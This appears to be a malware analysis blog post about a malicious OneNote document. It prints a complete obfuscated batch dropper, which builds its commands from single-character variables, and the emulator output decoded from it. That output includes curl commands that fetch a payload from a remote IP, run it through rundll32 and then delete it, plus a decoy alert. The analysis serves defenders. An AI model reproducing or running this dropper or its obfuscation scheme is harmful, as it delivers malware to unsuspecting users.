Obfuscated Batch Scripts in OneNote Document

This malicious OneNote document contains two obfuscated batch scripts; we will use our commercial Simple Batch Emulator package to understand what they do.

SHA256: 46149F56028829246628FFAFC58DF81A4B0FF1C87ED6466492E25AD2F23C0A13

We open the first batch script and decode its data to text with the action “Conversion -> Bytes to text” (Ctrl+R).

This is the batch script; as we can see, it is obfuscated.

REM Reviewer notes: obfuscated dropper script extracted from the OneNote document.
REM The emulator output later on this page shows the commands it assembles.
REM The opening line is a bogus command; its redirections discard the resulting
REM error, so nothing is printed. It serves only as visual noise.
GIFTS WITH DISCOUNTS >nul 2>&1 LIMITED OFFER
@echo off
REM Decoy status message shown to the user while the rest of the script runs.
echo Opening cloud attachment. Please, wait...

REM Character table: every randomly named variable holds exactly one character.
REM Later lines concatenate them into command strings, so no recognisable
REM keyword, file name or URL appears literally in the file. Special entries:
REM a caret-escaped ampersand, a doubled percent sign (expands to a single
REM percent), and one variable whose value is a single space. The interleaved
REM :: lines are random filler comments with no effect.
set MTwQKSgpMHQL=l
set kOMmbE=6
set ppriRNqimzzTSvKtXf=w
set xjkkaUqzMsQfwuOvO=N
set KSYAjImqTlEaqaUQk=j
set WpncDVBcWdl=:
set hXZtrthX=a
set tzEroXSbsuwcjP=R
set abwWhsgS=I
set BfVscWaRFhKFCmEn=G
set RFgBUQShCaK=t
set YSnYOZtiQGsHWbQ=\
set TcEDTQuiRCwRnCZ=.
set xClmPsTggJpylvV=e
set vNQWiteQi=~
set gMymvy=P
set "wzLrpmBHLFeDXp=^&"
set OGlxoeCqS=*
set ABCTXVZiIx=_
set xINjhSGoIiH=;
set CJIMOVQWfQXQOdw=T
set LEkBWAERtHbZHi=S
set LmUcrlUYz=X
set rBVcFPRbzVfPfSUyF=5
set FCWmviurmdolmnnUV=-
set UMoZSPjFJvvChEk=K
set QGYQnnwq=0
:: RPrSCzCUAATzV vqyBFMLBqtxnSlKMNs RdYRqenmbofWuRhYlp
set xexBeMXmOc=Y
set RerNvPMjfHYv=Z
set SSDGYSluOaABFTa=n
set Xvmanbnc=O
set BqhoBjkpoCfz=m
set kClPys=k
set EVXBVtuZWFNZFffZx=b
:: oNEHkdpApzcQojnR IkylOzKKzX
set salnQA=p
set IpPOCnYJoXfOpeA=v
set xauJWmnNKt=2
set iWoZxOXHmAlQyPzt=c
set CoXXaBVa=g
set NRQHwqYiLqQu=4
:: CKWYSylZoes byhWiriMNX
set lxegFxhbQBlOmLHpHo=9
set nYfHglKJWerCSSt=r
set vTDYJe=C
set WWBUqZ=A
:: QmKggo Tstispm
set hJOaPhawOaKZnvMvhu=U
set tboSNACgeGqhwKHB=x
set TbpVIiV=E
set XRLcqeXQGEgkGA=8
set chKxzHcuSqepx=f
set palzevPSCdzXI=F
set xqyxFN=,
set MAPaVaaVbcnCMF='
set cXJtyBgFnuLWwwuI=B
set FFbJYLTBUoyJKRNMX=h
set CZkQjeZGaJTFnMiPM=Q
set pdSNFGNiQFiVMb=H
set gIVLuIt=s
set DlvLVqg=W
:: JAbNuDdaMU FjiPpCzO LoheRy
set NkuszVZKTz=y
:: icuthSFXuaC dKsRVQ QmuhKSbMylnFCJoqvI
:: CBIXovGcLEYeZ
set dEDYlv=!
set TFeXZUqf=#
set OTiJUJwllhLt=i
set lHvFElIZMHqJAvGu=/
set LMehDCaBboTb=d
set OdLXhyBHVhmqSXw=%%
set PWMguBlyRx=L
set PgrmAuqfL= 
set sugcUnpjSvvQFACvv=7
set BVteXMgZfztowwMEiA=(
set dGyJnqxqXvDT=J
set ujWMrdCPoYEzMS=u
set lycYegmHsTmEckqeDV=D
set aRJyEodO=q
set XTtRjfHr=3
set YXXTzNnOalV=z
set HOlGVukZ=)
set vTKpxAwRymHcXF=M
set CqhVrRRZOybvn=o
set rcDoYVocath=V
:: wDWaEb NtljhLFEu hbfsdOvuLh
set pYRUIxzT=1
:: VbfcBgnL ImjuXPqMOzmYQnGqm
set sdKHQCulimAwBJR==
REM Self-relaunch guard (repeated further down): on the first run is_minimized
REM is unset, so the script sets it, starts its own path again with start /min
REM so the console window stays out of sight, and exits. The child process
REM inherits is_minimized and falls through. This minimised re-launch is a
REM reliable hunting indicator for this kind of dropper.
if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
REM Fragment assembly: each quoted set builds a five-character piece and the
REM unquoted set at the end joins the pieces into one string. This first string
REM is the mshta decoy alert that runs as the very last line of the script.
set "cjlpmAK=%BqhoBjkpoCfz%%gIVLuIt%%FFbJYLTBUoyJKRNMX%%RFgBUQShCaK%%hXZtrthX%"
set "znfBpu=%PgrmAuqfL%%KSYAjImqTlEaqaUQk%%hXZtrthX%%IpPOCnYJoXfOpeA%%hXZtrthX%"
set "mOYkTDxIlAGJa=%gIVLuIt%%iWoZxOXHmAlQyPzt%%nYfHglKJWerCSSt%%OTiJUJwllhLt%%salnQA%"
set "jLhqMhfFdfqsHmIn=%RFgBUQShCaK%%WpncDVBcWdl%%hXZtrthX%%MTwQKSgpMHQL%%xClmPsTggJpylvV%"
set "SfHNRwvBUb=%nYfHglKJWerCSSt%%RFgBUQShCaK%%BVteXMgZfztowwMEiA%%MAPaVaaVbcnCMF%%hJOaPhawOaKZnvMvhu%"
set "ncTaJBUiFsgEMdQMo=%SSDGYSluOaABFTa%%hXZtrthX%%EVXBVtuZWFNZFffZx%%MTwQKSgpMHQL%%xClmPsTggJpylvV%"
set "WzmDRG=%PgrmAuqfL%%RFgBUQShCaK%%CqhVrRRZOybvn%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%"
set "FMOdiuUuMpBN=%CqhVrRRZOybvn%%SSDGYSluOaABFTa%%SSDGYSluOaABFTa%%xClmPsTggJpylvV%%iWoZxOXHmAlQyPzt%"
set "oYFegi=%RFgBUQShCaK%%PgrmAuqfL%%RFgBUQShCaK%%CqhVrRRZOybvn%%PgrmAuqfL%"
set "EPDdkAFwIo=%RFgBUQShCaK%%FFbJYLTBUoyJKRNMX%%xClmPsTggJpylvV%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%"
set "xkLRLz=%MTwQKSgpMHQL%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%%LMehDCaBboTb%%dEDYlv%"
set "SxfykmrgpDooGMX=%PgrmAuqfL%%vTDYJe%%FFbJYLTBUoyJKRNMX%%xClmPsTggJpylvV%%iWoZxOXHmAlQyPzt%"
set "ctDNSwOPEy=%kClPys%%PgrmAuqfL%%NkuszVZKTz%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%"
set "RqozqythPRytu=%nYfHglKJWerCSSt%%PgrmAuqfL%%gIVLuIt%%hXZtrthX%%IpPOCnYJoXfOpeA%"
set "dNaCZTSbGMVlOUMv=%xClmPsTggJpylvV%%LMehDCaBboTb%%PgrmAuqfL%%iWoZxOXHmAlQyPzt%%nYfHglKJWerCSSt%"
set "yqGZymNyMRgpgYItUL=%xClmPsTggJpylvV%%LMehDCaBboTb%%xClmPsTggJpylvV%%SSDGYSluOaABFTa%%RFgBUQShCaK%"
set "IUWWMPjPiDQggIwb=%OTiJUJwllhLt%%hXZtrthX%%MTwQKSgpMHQL%%gIVLuIt%%PgrmAuqfL%"
set "hBhWgfli=%hXZtrthX%%SSDGYSluOaABFTa%%LMehDCaBboTb%%PgrmAuqfL%%nYfHglKJWerCSSt%"
set "CWProZLsDmpnMO=%xClmPsTggJpylvV%%RFgBUQShCaK%%nYfHglKJWerCSSt%%NkuszVZKTz%%TcEDTQuiRCwRnCZ%"
set "SVDRGSmTZXpy=%MAPaVaaVbcnCMF%%HOlGVukZ%%xINjhSGoIiH%%iWoZxOXHmAlQyPzt%%MTwQKSgpMHQL%"
set "lUFINBtqfEeBi=%CqhVrRRZOybvn%%gIVLuIt%%xClmPsTggJpylvV%%BVteXMgZfztowwMEiA%%HOlGVukZ%"
set "DLqlzxL=%xINjhSGoIiH%"
set bKrHQnJgYLkLRdlPfp=%cjlpmAK%%znfBpu%%mOYkTDxIlAGJa%%jLhqMhfFdfqsHmIn%%SfHNRwvBUb%%ncTaJBUiFsgEMdQMo%%WzmDRG%%FMOdiuUuMpBN%%oYFegi%%EPDdkAFwIo%%xkLRLz%%SxfykmrgpDooGMX%%ctDNSwOPEy%%RqozqythPRytu%%dNaCZTSbGMVlOUMv%%yqGZymNyMRgpgYItUL%%IUWWMPjPiDQggIwb%%hBhWgfli%%CWProZLsDmpnMO%%SVDRGSmTZXpy%%lUFINBtqfEeBi%%DLqlzxL%

REM Duplicate of the relaunch guard above; in the child process is_minimized is
REM already defined, so this line does nothing.
if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
REM Second group of fragments: the downloader command (curl with its silent and
REM fail flags), the remote URL, the output switch and the local file name, then
REM the rundll32 invocation, its ",init" export argument and a del command.
REM The emulator output on this page lists the decoded form of each.
set "MEiEysS=%iWoZxOXHmAlQyPzt%%ujWMrdCPoYEzMS%%nYfHglKJWerCSSt%%MTwQKSgpMHQL%%PgrmAuqfL%"
set "hEEZxQ=%FCWmviurmdolmnnUV%%gIVLuIt%%PgrmAuqfL%%FCWmviurmdolmnnUV%%FCWmviurmdolmnnUV%"
set "bSCPqurOBHv=%gIVLuIt%%gIVLuIt%%MTwQKSgpMHQL%%FCWmviurmdolmnnUV%%SSDGYSluOaABFTa%"
set "ENVkYMiFcyLeD=%CqhVrRRZOybvn%%FCWmviurmdolmnnUV%%nYfHglKJWerCSSt%%xClmPsTggJpylvV%%IpPOCnYJoXfOpeA%"
set "yhyKQvxJRAmfMmLrvQ=%CqhVrRRZOybvn%%kClPys%%xClmPsTggJpylvV%%PgrmAuqfL%%FCWmviurmdolmnnUV%"
set "zVnWsFDbegYBO=%FCWmviurmdolmnnUV%%chKxzHcuSqepx%%hXZtrthX%%OTiJUJwllhLt%%MTwQKSgpMHQL%"
set "xEsVgXu=%PgrmAuqfL%"
set xIKbuUril=%MEiEysS%%hEEZxQ%%bSCPqurOBHv%%ENVkYMiFcyLeD%%yhyKQvxJRAmfMmLrvQ%%zVnWsFDbegYBO%%xEsVgXu%
set "GyQPcYnVsENQBwBT=%PgrmAuqfL%%FCWmviurmdolmnnUV%%FCWmviurmdolmnnUV%%CqhVrRRZOybvn%%ujWMrdCPoYEzMS%"
set "LQZZUjqMilSGG=%RFgBUQShCaK%%salnQA%%ujWMrdCPoYEzMS%%RFgBUQShCaK%%PgrmAuqfL%"
set "jhqGuvWYATsIiWC="
set SFdNuqILphV=%GyQPcYnVsENQBwBT%%LQZZUjqMilSGG%%jhqGuvWYATsIiWC%
set "ZYxjxzYjLeO=%FFbJYLTBUoyJKRNMX%%RFgBUQShCaK%%RFgBUQShCaK%%salnQA%%WpncDVBcWdl%"
set "hnigHp=%lHvFElIZMHqJAvGu%%lHvFElIZMHqJAvGu%%lxegFxhbQBlOmLHpHo%%pYRUIxzT%%TcEDTQuiRCwRnCZ%"
set "vVMqMZEfrsRch=%xauJWmnNKt%%xauJWmnNKt%%XRLcqeXQGEgkGA%%TcEDTQuiRCwRnCZ%%pYRUIxzT%"
set "DaDpbPEzhPdJGKKGgR=%QGYQnnwq%%TcEDTQuiRCwRnCZ%%pYRUIxzT%%XTtRjfHr%%NRQHwqYiLqQu%"
set "DtYdKvm=%lHvFElIZMHqJAvGu%%gIVLuIt%%ujWMrdCPoYEzMS%%nYfHglKJWerCSSt%%chKxzHcuSqepx%"
set "BJNiXGg=%hXZtrthX%%iWoZxOXHmAlQyPzt%%xClmPsTggJpylvV%%lHvFElIZMHqJAvGu%%KSYAjImqTlEaqaUQk%"
set "bMvXsjUVjZbwIIyde=%xjkkaUqzMsQfwuOvO%%kClPys%%EVXBVtuZWFNZFffZx%%kOMmbE%%lxegFxhbQBlOmLHpHo%"
set "uClHPvlSNy=%kOMmbE%%YXXTzNnOalV%%tboSNACgeGqhwKHB%%WWBUqZ%%Xvmanbnc%"
set "lNLOveFOJabtAtqdjy=%xexBeMXmOc%%ABCTXVZiIx%%ujWMrdCPoYEzMS%%pYRUIxzT%%IpPOCnYJoXfOpeA%"
set "rZMPaKQnRSsL=%NkuszVZKTz%%aRJyEodO%%gIVLuIt%%CqhVrRRZOybvn%%QGYQnnwq%"
set "FVFhwo=%XTtRjfHr%%salnQA%%vTKpxAwRymHcXF%%pYRUIxzT%%tzEroXSbsuwcjP%"
set "kdZZTx=%ppriRNqimzzTSvKtXf%%cXJtyBgFnuLWwwuI%%kOMmbE%%OTiJUJwllhLt%%LmUcrlUYz%"
set "eLhtMYXkdwHI=%kClPys%%lxegFxhbQBlOmLHpHo%%WWBUqZ%%vNQWiteQi%%vNQWiteQi%"
set "BJWSwhpPmVXngzod=%lHvFElIZMHqJAvGu%%ABCTXVZiIx%%aRJyEodO%%MTwQKSgpMHQL%%LmUcrlUYz%"
set "bEwVCCLtCoQNx=%chKxzHcuSqepx%%YXXTzNnOalV%%xjkkaUqzMsQfwuOvO%%KSYAjImqTlEaqaUQk%%UMoZSPjFJvvChEk%"
set "hfpLYvBbEIbrisf=%gIVLuIt%%XTtRjfHr%%OTiJUJwllhLt%%gIVLuIt%%NRQHwqYiLqQu%"
set "UpezsVhTToDIPyd=%RFgBUQShCaK%%ABCTXVZiIx%%QGYQnnwq%%IpPOCnYJoXfOpeA%%dGyJnqxqXvDT%"
set "jPOromFtXDn=%abwWhsgS%%salnQA%%hXZtrthX%%CqhVrRRZOybvn%%BqhoBjkpoCfz%"
set "oKQzltmDjTukIOpV=%RerNvPMjfHYv%%palzevPSCdzXI%%gIVLuIt%%lycYegmHsTmEckqeDV%%xauJWmnNKt%"
set "GJSANIkzMYkizi=%CoXXaBVa%%EVXBVtuZWFNZFffZx%%rcDoYVocath%%FFbJYLTBUoyJKRNMX%%ppriRNqimzzTSvKtXf%"
set "ltLlkobfEXFqnwkYdh=%vNQWiteQi%%vNQWiteQi%%lHvFElIZMHqJAvGu%"
set jfMGIEDYGAgCHHJUgC=%ZYxjxzYjLeO%%hnigHp%%vVMqMZEfrsRch%%DaDpbPEzhPdJGKKGgR%%DtYdKvm%%BJNiXGg%%bMvXsjUVjZbwIIyde%%uClHPvlSNy%%lNLOveFOJabtAtqdjy%%rZMPaKQnRSsL%%FVFhwo%%kdZZTx%%eLhtMYXkdwHI%%BJWSwhpPmVXngzod%%bEwVCCLtCoQNx%%hfpLYvBbEIbrisf%%UpezsVhTToDIPyd%%jPOromFtXDn%%oKQzltmDjTukIOpV%%GJSANIkzMYkizi%%ltLlkobfEXFqnwkYdh%
set "kjamXhOLYpt=%gIVLuIt%%CqhVrRRZOybvn%%LMehDCaBboTb%%SSDGYSluOaABFTa%%NkuszVZKTz%"
set "SMVCxTQcVXzqCYLqR=%BqhoBjkpoCfz%%nYfHglKJWerCSSt%%salnQA%%TcEDTQuiRCwRnCZ%%KSYAjImqTlEaqaUQk%"
set "ZFxCfsVnwlDI=%gIVLuIt%%KSYAjImqTlEaqaUQk%"
set MNbiLHzZgYRjURP=%kjamXhOLYpt%%SMVCxTQcVXzqCYLqR%%ZFxCfsVnwlDI%
set "vMhvNuNL=%nYfHglKJWerCSSt%%ujWMrdCPoYEzMS%%SSDGYSluOaABFTa%%LMehDCaBboTb%%MTwQKSgpMHQL%"
set "aQNPBZPCpHS=%MTwQKSgpMHQL%%XTtRjfHr%%xauJWmnNKt%%PgrmAuqfL%"
set OqroxhdAgfsysPZ=%vMhvNuNL%%aQNPBZPCpHS%
set "IuipCtfGWFReSRk=%xqyxFN%%OTiJUJwllhLt%%SSDGYSluOaABFTa%%OTiJUJwllhLt%%RFgBUQShCaK%"
set "rwYhYAS="
set FdtCBRu=%IuipCtfGWFReSRk%%rwYhYAS%
set "ghStZE=%LMehDCaBboTb%%xClmPsTggJpylvV%%MTwQKSgpMHQL%%PgrmAuqfL%"
set DTyxOFBzvxX=%ghStZE%
REM Execution: each line below is nothing but expanded variables and runs as a
REM command, in order: download, run the file through rundll32, delete it, then
REM the mshta decoy alert. A line made solely of an expanded variable is itself
REM a strong static indicator of this obfuscation style.
%xIKbuUril%%jfMGIEDYGAgCHHJUgC%%SFdNuqILphV%%MNbiLHzZgYRjURP%
%OqroxhdAgfsysPZ%%MNbiLHzZgYRjURP%%FdtCBRu%
%DTyxOFBzvxX%%MNbiLHzZgYRjURP%

%bKrHQnJgYLkLRdlPfp%

We run the batch emulator.

The emulator prints the result of the emulation to the output view.

This is the output:

echo: Opening cloud attachment. Please, wait...
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: curl -s --ssl-no-revoke --fail http://91.228.10.134/surface/jNkb696zxAOY_u1vyqso03pM1RwB6iXk9A~~/_qlXfzNjKs3is4t_0vJIpaomZFsD2gbVhw~~/ --output sodnymrp.jsj
unsupported command: rundll32 sodnymrp.jsj,init
unsupported command: del sodnymrp.jsj
unsupported command: mshta javascript:alert("Unable to connect to the cloud! Check your saved credentials and retry.");close();

As we can see, the script tries to download a file from a URL, uses “rundll32” to execute the downloaded file (calling its “init” export), and then deletes it. In the end, as a decoy, it warns the user that it couldn’t connect to the cloud to open the attachment.

We can repeat the same operations with the second script.

The second script executes the same operations; the only difference is the on-disk file name of the downloaded file.

echo: Opening cloud attachment. Please, wait...
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: if not defined is_minimized set is_minimized=1 && start "" /min "%~dpnx0" %* && exit
unsupported command: curl -s --ssl-no-revoke --fail http://91.228.10.134/surface/jNkb696zxAOY_u1vyqso03pM1RwB6iXk9A~~/_qlXfzNjKs3is4t_0vJIpaomZFsD2gbVhw~~/ --output fjxipv.jah
unsupported command: rundll32 fjxipv.jah,init
unsupported command: del fjxipv.jah
unsupported command: mshta javascript:alert("Unable to connect to the cloud! Check your saved credentials and retry.");close();
